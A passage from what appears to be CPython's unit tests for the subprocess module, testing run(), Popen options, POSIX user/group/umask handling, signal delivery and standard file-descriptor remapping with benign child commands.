self.assertIsInstance(subprocess.CompletedProcess[str], types.GenericAlias)
class RunFuncTestCase(BaseTestCase):
def run_python(self, code, **kwargs):
"""Run Python code in a subprocess using subprocess.run"""
argv = [sys.executable, "-c", code]
return subprocess.run(argv, **kwargs)
def test_returncode(self):
# call() function with sequence argument
cp = self.run_python("import sys; sys.exit(47)")
self.assertEqual(cp.returncode, 47)
with self.assertRaises(subprocess.CalledProcessError):
cp.check_returncode()
def test_check(self):
with self.assertRaises(subprocess.CalledProcessError) as c:
self.run_python("import sys; sys.exit(47)", check=True)
self.assertEqual(c.exception.returncode, 47)
def test_check_zero(self):
# check_returncode shouldn't raise when returncode is zero
cp = subprocess.run(ZERO_RETURN_CMD, check=True)
self.assertEqual(cp.returncode, 0)
def test_timeout(self):
# run() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.run waits for the
# child.
with self.assertRaises(subprocess.TimeoutExpired):
self.run_python("while True: pass", timeout=0.0001)
def test_capture_stdout(self):
# capture stdout with zero return code
cp = self.run_python("print('BDFL')", stdout=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stdout)
def test_capture_stderr(self):
cp = self.run_python("import sys; sys.stderr.write('BDFL')",
stderr=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stderr)
def test_check_output_stdin_arg(self):
# run() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
stdin=tf, stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
input=b'pear', stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_stdin_with_input_arg(self):
# run() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError,
msg="Expected ValueError when stdin and input args supplied.") as c:
output = self.run_python("print('will not be run')",
stdin=tf, input=b'hare')
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
with self.assertRaises(subprocess.TimeoutExpired) as c:
cp = self.run_python((
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"),
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3, stdout=subprocess.PIPE)
self.assertEqual(c.exception.output, b'BDFL')
# output is aliased to stdout
self.assertEqual(c.exception.stdout, b'BDFL')
def test_run_kwargs(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
cp = self.run_python(('import sys, os;'
'sys.exit(33 if os.getenv("FRUIT")=="banana" else 31)'),
env=newenv)
self.assertEqual(cp.returncode, 33)
def test_run_with_pathlike_path(self):
# bpo-31961: test run(pathlike_object)
# the name of a command that can be run without
# any arguments that exit fast
prog = 'tree.com' if mswindows else 'ls'
path = shutil.which(prog)
if path is None:
self.skipTest(f'{prog} required for this test')
path = FakePath(path)
res = subprocess.run(path, stdout=subprocess.DEVNULL)
self.assertEqual(res.returncode, 0)
with self.assertRaises(TypeError):
subprocess.run(path, stdout=subprocess.DEVNULL, shell=True)
def test_run_with_bytes_path_and_arguments(self):
# bpo-31961: test run([bytes_object, b'additional arguments'])
path = os.fsencode(sys.executable)
args = [path, '-c', b'import sys; sys.exit(57)']
res = subprocess.run(args)
self.assertEqual(res.returncode, 57)
def test_run_with_pathlike_path_and_arguments(self):
# bpo-31961: test run([pathlike_object, 'additional arguments'])
path = FakePath(sys.executable)
args = [path, '-c', 'import sys; sys.exit(57)']
res = subprocess.run(args)
self.assertEqual(res.returncode, 57)
def test_capture_output(self):
cp = self.run_python(("import sys;"
"sys.stdout.write('BDFL'); "
"sys.stderr.write('FLUFL')"),
capture_output=True)
self.assertIn(b'BDFL', cp.stdout)
self.assertIn(b'FLUFL', cp.stderr)
def test_stdout_with_capture_output_arg(self):
# run() refuses to accept 'stdout' with 'capture_output'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
with self.assertRaises(ValueError,
msg=("Expected ValueError when stdout and capture_output "
"args supplied.")) as c:
output = self.run_python("print('will not be run')",
capture_output=True, stdout=tf)
self.assertIn('stdout', c.exception.args[0])
self.assertIn('capture_output', c.exception.args[0])
def test_stderr_with_capture_output_arg(self):
# run() refuses to accept 'stderr' with 'capture_output'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
with self.assertRaises(ValueError,
msg=("Expected ValueError when stderr and capture_output "
"args supplied.")) as c:
output = self.run_python("print('will not be run')",
capture_output=True, stderr=tf)
self.assertIn('stderr', c.exception.args[0])
self.assertIn('capture_output', c.exception.args[0])
# This test _might_ wind up a bit fragile on loaded build+test machines
# as it depends on the timing with wide enough margins for normal situations
# but does assert that it happened "soon enough" to believe the right thing
# happened.
@unittest.skipIf(mswindows, "requires posix like 'sleep' shell command")
def test_run_with_shell_timeout_and_capture_output(self):
"""Output capturing after a timeout mustn't hang forever on open filehandles."""
before_secs = time.monotonic()
try:
subprocess.run('sleep 3', shell=True, timeout=0.1,
capture_output=True) # New session unspecified.
except subprocess.TimeoutExpired as exc:
after_secs = time.monotonic()
stacks = traceback.format_exc() # assertRaises doesn't give this.
else:
self.fail("TimeoutExpired not raised.")
self.assertLess(after_secs - before_secs, 1.5,
msg="TimeoutExpired was delayed! Bad traceback:\n```\n"
f"{stacks}```")
def _get_test_grp_name():
for name_group in ('staff', 'nogroup', 'grp', 'nobody', 'nfsnobody'):
if grp:
try:
grp.getgrnam(name_group)
except KeyError:
continue
return name_group
else:
raise unittest.SkipTest('No identified group name to use for this test on this platform.')
@unittest.skipIf(mswindows, "POSIX specific tests")
class POSIXProcessTestCase(BaseTestCase):
def setUp(self):
super().setUp()
self._nonexistent_dir = "/_this/pa.th/does/not/exist"
def _get_chdir_exception(self):
try:
os.chdir(self._nonexistent_dir)
except OSError as e:
# This avoids hard coding the errno value or the OS perror()
# string and instead capture the exception that we want to see
# below for comparison.
desired_exception = e
else:
self.fail("chdir to nonexistent directory %s succeeded." %
self._nonexistent_dir)
return desired_exception
def test_exception_cwd(self):
"""Test error in the child raised in the parent for a bad cwd."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
cwd=self._nonexistent_dir)
except OSError as e:
# Test that the child process chdir failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_executable(self):
"""Test error in the child raised in the parent for a bad executable."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
executable=self._nonexistent_dir)
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_args_0(self):
"""Test error in the child raised in the parent for a bad args[0]."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([self._nonexistent_dir, "-c", ""])
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
# We mock the __del__ method for Popen in the next two tests
# because it does cleanup based on the pid returned by fork_exec
# along with issuing a resource warning if it still exists. Since
# we don't actually spawn a process in these tests we can forego
# the destructor. An alternative would be to set _child_created to
# False before the destructor is called but there is no easy way
# to do that
class PopenNoDestructor(subprocess.Popen):
def __del__(self):
pass
@mock.patch("subprocess._posixsubprocess.fork_exec")
def test_exception_errpipe_normal(self, fork_exec):
"""Test error passing done through errpipe_write in the good case"""
def proper_error(*args):
errpipe_write = args[13]
# Write the hex for the error code EISDIR: 'is a directory'
err_code = '{:x}'.format(errno.EISDIR).encode()
os.write(errpipe_write, b"OSError:" + err_code + b":")
return 0
fork_exec.side_effect = proper_error
with mock.patch("subprocess.os.waitpid",
side_effect=ChildProcessError):
with self.assertRaises(IsADirectoryError):
self.PopenNoDestructor(["non_existent_command"])
@mock.patch("subprocess._posixsubprocess.fork_exec")
def test_exception_errpipe_bad_data(self, fork_exec):
"""Test error passing done through errpipe_write where its not
in the expected format"""
error_data = b"\xFF\x00\xDE\xAD"
def bad_error(*args):
errpipe_write = args[13]
# Anything can be in the pipe, no assumptions should
# be made about its encoding, so we'll write some
# arbitrary hex bytes to test it out
os.write(errpipe_write, error_data)
return 0
fork_exec.side_effect = bad_error
with mock.patch("subprocess.os.waitpid",
side_effect=ChildProcessError):
with self.assertRaises(subprocess.SubprocessError) as e:
self.PopenNoDestructor(["non_existent_command"])
self.assertIn(repr(error_data), str(e.exception))
@unittest.skipIf(not os.path.exists('/proc/self/status'),
"need /proc/self/status")
def test_restore_signals(self):
# Blindly assume that cat exists on systems with /proc/self/status...
default_proc_status = subprocess.check_output(
['cat', '/proc/self/status'],
restore_signals=False)
for line in default_proc_status.splitlines():
if line.startswith(b'SigIgn'):
default_sig_ign_mask = line
break
else:
self.skipTest("SigIgn not found in /proc/self/status.")
restored_proc_status = subprocess.check_output(
['cat', '/proc/self/status'],
restore_signals=True)
for line in restored_proc_status.splitlines():
if line.startswith(b'SigIgn'):
restored_sig_ign_mask = line
break
self.assertNotEqual(default_sig_ign_mask, restored_sig_ign_mask,
msg="restore_signals=True should've unblocked "
"SIGPIPE and friends.")
def test_start_new_session(self):
# For code coverage of calling setsid(). We don't care if we get an
# EPERM error from it depending on the test execution environment, that
# still indicates that it was called.
try:
output = subprocess.check_output(
[sys.executable, "-c", "import os; print(os.getsid(0))"],
start_new_session=True)
except OSError as e:
if e.errno != errno.EPERM:
raise
else:
parent_sid = os.getsid(0)
child_sid = int(output)
self.assertNotEqual(parent_sid, child_sid)
@unittest.skipUnless(hasattr(os, 'setreuid'), 'no setreuid on platform')
def test_user(self):
# For code coverage of the user parameter. We don't care if we get an
# EPERM error from it depending on the test execution environment, that
# still indicates that it was called.
uid = os.geteuid()
test_users = [65534 if uid != 65534 else 65533, uid]
name_uid = "nobody" if sys.platform != 'darwin' else "unknown"
if pwd is not None:
try:
pwd.getpwnam(name_uid)
test_users.append(name_uid)
except KeyError:
# unknown user name
name_uid = None
for user in test_users:
# posix_spawn() may be used with close_fds=False
for close_fds in (False, True):
with self.subTest(user=user, close_fds=close_fds):
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os; print(os.getuid())"],
user=user,
close_fds=close_fds)
except PermissionError: # (EACCES, EPERM)
pass
except OSError as e:
if e.errno not in (errno.EACCES, errno.EPERM):
raise
else:
if isinstance(user, str):
user_uid = pwd.getpwnam(user).pw_uid
else:
user_uid = user
child_user = int(output)
self.assertEqual(child_user, user_uid)
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, user=-1)
if pwd is None and name_uid is not None:
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, user=name_uid)
@unittest.skipIf(hasattr(os, 'setreuid'), 'setreuid() available on platform')
def test_user_error(self):
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, user=65535)
@unittest.skipUnless(hasattr(os, 'setregid'), 'no setregid() on platform')
def test_group(self):
gid = os.getegid()
group_list = [65534 if gid != 65534 else 65533]
name_group = _get_test_grp_name()
if grp is not None:
group_list.append(name_group)
for group in group_list + [gid]:
# posix_spawn() may be used with close_fds=False
for close_fds in (False, True):
with self.subTest(group=group, close_fds=close_fds):
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os; print(os.getgid())"],
group=group,
close_fds=close_fds)
except PermissionError: # (EACCES, EPERM)
pass
else:
if isinstance(group, str):
group_gid = grp.getgrnam(group).gr_gid
else:
group_gid = group
child_group = int(output)
self.assertEqual(child_group, group_gid)
# make sure we bomb on negative values
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, group=-1)
if grp is None:
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, group=name_group)
@unittest.skipIf(hasattr(os, 'setregid'), 'setregid() available on platform')
def test_group_error(self):
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, group=65535)
@unittest.skipUnless(hasattr(os, 'setgroups'), 'no setgroups() on platform')
def test_extra_groups(self):
gid = os.getegid()
group_list = [65534 if gid != 65534 else 65533]
name_group = _get_test_grp_name()
perm_error = False
if grp is not None:
group_list.append(name_group)
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os, sys, json; json.dump(os.getgroups(), sys.stdout)"],
extra_groups=group_list)
except OSError as ex:
if ex.errno != errno.EPERM:
raise
perm_error = True
else:
parent_groups = os.getgroups()
child_groups = json.loads(output)
if grp is not None:
desired_gids = [grp.getgrnam(g).gr_gid if isinstance(g, str) else g
for g in group_list]
else:
desired_gids = group_list
if perm_error:
self.assertEqual(set(child_groups), set(parent_groups))
else:
self.assertEqual(set(desired_gids), set(child_groups))
# make sure we bomb on negative values
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, extra_groups=[-1])
if grp is None:
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD,
extra_groups=[name_group])
@unittest.skipIf(hasattr(os, 'setgroups'), 'setgroups() available on platform')
def test_extra_groups_error(self):
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, extra_groups=[])
@unittest.skipIf(mswindows or not hasattr(os, 'umask'),
'POSIX umask() is not available.')
def test_umask(self):
tmpdir = None
try:
tmpdir = tempfile.mkdtemp()
name = os.path.join(tmpdir, "beans")
# We set an unusual umask in the child so as a unique mode
# for us to test the child's touched file for.
subprocess.check_call(
[sys.executable, "-c", f"open({name!r}, 'w').close()"],
umask=0o053)
# Ignore execute permissions entirely in our test,
# filesystems could be mounted to ignore or force that.
st_mode = os.stat(name).st_mode & 0o666
expected_mode = 0o624
self.assertEqual(expected_mode, st_mode,
msg=f'{oct(expected_mode)} != {oct(st_mode)}')
finally:
if tmpdir is not None:
shutil.rmtree(tmpdir)
def test_run_abort(self):
# returncode handles signal termination
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import os; os.abort()'])
p.wait()
self.assertEqual(-p.returncode, signal.SIGABRT)
def test_CalledProcessError_str_signal(self):
err = subprocess.CalledProcessError(-int(signal.SIGABRT), "fake cmd")
error_string = str(err)
# We're relying on the repr() of the signal.Signals intenum to provide
# the word signal, the signal name and the numeric value.
self.assertIn("signal", error_string.lower())
# We're not being specific about the signal name as some signals have
# multiple names and which name is revealed can vary.
self.assertIn("SIG", error_string)
self.assertIn(str(signal.SIGABRT), error_string)
def test_CalledProcessError_str_unknown_signal(self):
err = subprocess.CalledProcessError(-9876543, "fake cmd")
error_string = str(err)
self.assertIn("unknown signal 9876543.", error_string)
def test_CalledProcessError_str_non_zero(self):
err = subprocess.CalledProcessError(2, "fake cmd")
error_string = str(err)
self.assertIn("non-zero exit status 2.", error_string)
def test_preexec(self):
# DISCLAIMER: Setting environment variables is *not* a good use
# of a preexec_fn. This is merely a test.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
preexec_fn=lambda: os.putenv("FRUIT", "apple"))
with p:
self.assertEqual(p.stdout.read(), b"apple")
def test_preexec_exception(self):
def raise_it():
raise ValueError("What if two swallows carried a coconut?")
try:
p = subprocess.Popen([sys.executable, "-c", ""],
preexec_fn=raise_it)
except subprocess.SubprocessError as e:
self.assertTrue(
subprocess._posixsubprocess,
"Expected a ValueError from the preexec_fn")
except ValueError as e:
self.assertIn("coconut", e.args[0])
else:
self.fail("Exception raised by preexec_fn did not make it "
"to the parent process.")
class _TestExecuteChildPopen(subprocess.Popen):
"""Used to test behavior at the end of _execute_child."""
def __init__(self, testcase, *args, **kwargs):
self._testcase = testcase
subprocess.Popen.__init__(self, *args, **kwargs)
def _execute_child(self, *args, **kwargs):
try:
subprocess.Popen._execute_child(self, *args, **kwargs)
finally:
# Open a bunch of file descriptors and verify that
# none of them are the same as the ones the Popen
# instance is using for stdin/stdout/stderr.
devzero_fds = [os.open("/dev/zero", os.O_RDONLY)
for _ in range(8)]
try:
for fd in devzero_fds:
self._testcase.assertNotIn(
fd, (self.stdin.fileno(), self.stdout.fileno(),
self.stderr.fileno()),
msg="At least one fd was closed early.")
finally:
for fd in devzero_fds:
os.close(fd)
@unittest.skipIf(not os.path.exists("/dev/zero"), "/dev/zero required.")
def test_preexec_errpipe_does_not_double_close_pipes(self):
"""Issue16140: Don't double close pipes on preexec error."""
def raise_it():
raise subprocess.SubprocessError(
"force the _execute_child() errpipe_data path.")
with self.assertRaises(subprocess.SubprocessError):
self._TestExecuteChildPopen(
self, ZERO_RETURN_CMD,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, preexec_fn=raise_it)
def test_preexec_gc_module_failure(self):
# This tests the code that disables garbage collection if the child
# process will execute any Python.
def raise_runtime_error():
raise RuntimeError("this shouldn't escape")
enabled = gc.isenabled()
orig_gc_disable = gc.disable
orig_gc_isenabled = gc.isenabled
try:
gc.disable()
self.assertFalse(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertFalse(gc.isenabled(),
"Popen enabled gc when it shouldn't.")
gc.enable()
self.assertTrue(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertTrue(gc.isenabled(), "Popen left gc disabled.")
gc.disable = raise_runtime_error
self.assertRaises(RuntimeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
del gc.isenabled # force an AttributeError
self.assertRaises(AttributeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
finally:
gc.disable = orig_gc_disable
gc.isenabled = orig_gc_isenabled
if not enabled:
gc.disable()
@unittest.skipIf(
sys.platform == 'darwin', 'setrlimit() seems to fail on OS X')
def test_preexec_fork_failure(self):
# The internal code did not preserve the previous exception when
# re-enabling garbage collection
try:
from resource import getrlimit, setrlimit, RLIMIT_NPROC
except ImportError as err:
self.skipTest(err) # RLIMIT_NPROC is specific to Linux and BSD
limits = getrlimit(RLIMIT_NPROC)
[_, hard] = limits
setrlimit(RLIMIT_NPROC, (0, hard))
self.addCleanup(setrlimit, RLIMIT_NPROC, limits)
try:
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
except BlockingIOError:
# Forking should raise EAGAIN, translated to BlockingIOError
pass
else:
self.skipTest('RLIMIT_NPROC had no effect; probably superuser')
def test_args_string(self):
# args is a string
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
p = subprocess.Popen(fname)
p.wait()
os.remove(fname)
self.assertEqual(p.returncode, 47)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
startupinfo=47)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
creationflags=47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen(["echo $FRUIT"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen("echo $FRUIT", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_call_string(self):
# call() function with string argument on UNIX
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
rc = subprocess.call(fname)
os.remove(fname)
self.assertEqual(rc, 47)
def test_specific_shell(self):
# Issue #9265: Incorrect name passed as arg[0].
shells = []
for prefix in ['/bin', '/usr/bin/', '/usr/local/bin']:
for name in ['bash', 'ksh']:
sh = os.path.join(prefix, name)
if os.path.isfile(sh):
shells.append(sh)
if not shells: # Will probably work for any shell but csh.
self.skipTest("bash or ksh required for this test")
sh = '/bin/sh'
if os.path.isfile(sh) and not os.path.islink(sh):
# Test will fail if /bin/sh is a symlink to csh.
shells.append(sh)
for sh in shells:
p = subprocess.Popen("echo $0", executable=sh, shell=True,
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read().strip(), bytes(sh, 'ascii'))
def _kill_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
# Also set the SIGINT handler to the default to make sure it's not
# being ignored (some tests rely on that.)
old_handler = signal.signal(signal.SIGINT, signal.default_int_handler)
try:
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
signal.signal(signal.SIGINT, old_handler)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
return p
@unittest.skipIf(sys.platform.startswith(('netbsd', 'openbsd')),
"Due to known OS bug (issue #16762)")
def _kill_dead_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
p.communicate()
def test_send_signal(self):
p = self._kill_process('send_signal', signal.SIGINT)
_, stderr = p.communicate()
self.assertIn(b'KeyboardInterrupt', stderr)
self.assertNotEqual(p.wait(), 0)
def test_kill(self):
p = self._kill_process('kill')
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGKILL)
def test_terminate(self):
p = self._kill_process('terminate')
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGTERM)
def test_send_signal_dead(self):
# Sending a signal to a dead process
self._kill_dead_process('send_signal', signal.SIGINT)
def test_kill_dead(self):
# Killing a dead process
self._kill_dead_process('kill')
def test_terminate_dead(self):
# Terminating a dead process
self._kill_dead_process('terminate')
def _save_fds(self, save_fds):
fds = []
for fd in save_fds:
inheritable = os.get_inheritable(fd)
saved = os.dup(fd)
fds.append((fd, saved, inheritable))
return fds
def _restore_fds(self, fds):
for fd, saved, inheritable in fds:
os.dup2(saved, fd, inheritable=inheritable)
os.close(saved)
def check_close_std_fds(self, fds):
# Issue #9905: test that subprocess pipes still work properly with
# some standard fds closed
stdin = 0
saved_fds = self._save_fds(fds)
for fd, saved, inheritable in saved_fds:
if fd == 0:
stdin = saved
break
try:
for fd in fds:
os.close(fd)
out, err = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
self.assertEqual(out, b'apple')
self.assertEqual(err, b'orange')
finally:
self._restore_fds(saved_fds)
def test_close_fd_0(self):
self.check_close_std_fds([0])
def test_close_fd_1(self):
self.check_close_std_fds([1])
def test_close_fd_2(self):
self.check_close_std_fds([2])
def test_close_fds_0_1(self):
self.check_close_std_fds([0, 1])
def test_close_fds_0_2(self):
self.check_close_std_fds([0, 2])
def test_close_fds_1_2(self):
self.check_close_std_fds([1, 2])
def test_close_fds_0_1_2(self):
# Issue #10806: test that subprocess pipes still work properly with
# all standard fds closed.
self.check_close_std_fds([0, 1, 2])
def test_small_errpipe_write_fd(self):
"""Issue #15798: Popen should work when stdio fds are available."""
new_stdin = os.dup(0)
new_stdout = os.dup(1)
try:
os.close(0)
os.close(1)
# Side test: if errpipe_write fails to have its CLOEXEC
# flag set this should cause the parent to think the exec
# failed. Extremely unlikely: everyone supports CLOEXEC.
subprocess.Popen([
sys.executable, "-c",
"print('AssertionError:0:CLOEXEC failure.')"]).wait()
finally:
# Restore original stdin and stdout
os.dup2(new_stdin, 0)
os.dup2(new_stdout, 1)
os.close(new_stdin)
os.close(new_stdout)
def test_remapping_std_fds(self):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
try:
temp_fds = [fd for fd, fname in temps]
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# write some data to what will become stdin, and rewind
os.write(temp_fds[1], b"STDIN")
os.lseek(temp_fds[1], 0, 0)
# move the standard file descriptors out of the way
saved_fds = self._save_fds(range(3))
try:
# duplicate the file objects over the standard fd's
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# now use those files in the "wrong" order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=temp_fds[1],
stdout=temp_fds[2],
stderr=temp_fds[0])
p.wait()
finally:
self._restore_fds(saved_fds)
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(temp_fds[2], 1024)
err = os.read(temp_fds[0], 1024).strip()
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
def check_swap_fds(self, stdin_no, stdout_no, stderr_no):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
temp_fds = [fd for fd, fname in temps]
try:
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# save a copy of the standard file descriptors
saved_fds = self._save_fds(range(3))
try:
# duplicate the temp files over the standard fd's 0, 1, 2
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# write some data to what will become stdin, and rewind
os.write(stdin_no, b"STDIN")
os.lseek(stdin_no, 0, 0)
# now use those files in the given order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=stdin_no,
stdout=stdout_no,
stderr=stderr_no)
p.wait()
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(stdout_no, 1024)
err = os.read(stderr_no, 1024).strip()
finally:
self._restore_fds(saved_fds)
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
# When duping fds, if there arises a situation where one of the fds is
# either 0, 1 or 2, it is possible that it is overwritten (#12607).
# This tests all combinations of this.
def test_swap_fds(self):
self.check_swap_fds(0, 1, 2)
self.check_swap_fds(0, 2, 1)
self.check_swap_fds(1, 0, 2)
self.check_swap_fds(1, 2, 0)
self.check_swap_fds(2, 0, 1)
self.check_swap_fds(2, 1, 0)
def _check_swap_std_fds_with_one_closed(self, from_fds, to_fds):
saved_fds = self._save_fds(range(3))
try:
for from_fd in from_fds:
with tempfile.TemporaryFile() as f:
os.dup2(f.fileno(), from_fd)
fd_to_close = (set(range(3)) - set(from_fds)).pop()
os.close(fd_to_close)
arg_names = ['stdin', 'stdout', 'stderr']
kwargs = {}
for from_fd, to_fd in zip(from_fds, to_fds):
kwargs[arg_names[to_fd]] = from_fd
code = textwrap.dedent(r'''
import os, sys
skipped_fd = int(sys.argv[1])
for fd in range(3):
if fd != skipped_fd:
os.write(fd, str(fd).encode('ascii'))
''')
skipped_fd = (set(range(3)) - set(to_fds)).pop()
rc = subprocess.call([sys.executable, '-c', code, str(skipped_fd)],
**kwargs)
self.assertEqual(rc, 0)
for from_fd, to_fd in zip(from_fds, to_fds):
os.lseek(from_fd, 0, os.SEEK_SET)
read_bytes = os.read(from_fd, 1024)
read_fds = list(map(int, read_bytes.decode('ascii')))
msg = textwrap.dedent(f"""
When testing {from_fds} to {to_fds} redirection,
parent descriptor {from_fd} got redirected
to descriptor(s) {read_fds} instead of descriptor {to_fd}.
""")
self.assertEqual([to_fd], read_fds, msg)
finally:
self._restore_fds(saved_fds)
# Check that subprocess can remap std fds correctly even
# if one of them is closed (#32844).
def test_swap_std_fds_with_one_closed(self):
for from_fds in itertools.combinations(range(3), 2):
for to_fds in itertools.permutations(range(3), 2):
self._check_swap_std_fds_with_one_closed(from_fds, to_fds)
def test_surrogates_error_message(self):
def prepare():
raise ValueError("surrogate:\uDCff")
try:
subprocess.call(
ZERO_RETURN_CMD,
preexec_fn=prepare)
except ValueError as err:
# Pure Python implementations keeps the message
self.assertIsNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "surrogate:\uDCff")
except subprocess.SubprocessError as err:
# _posixsubprocess uses a default message
self.assertIsNotNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "Exception occurred in preexec_fn.")
else:
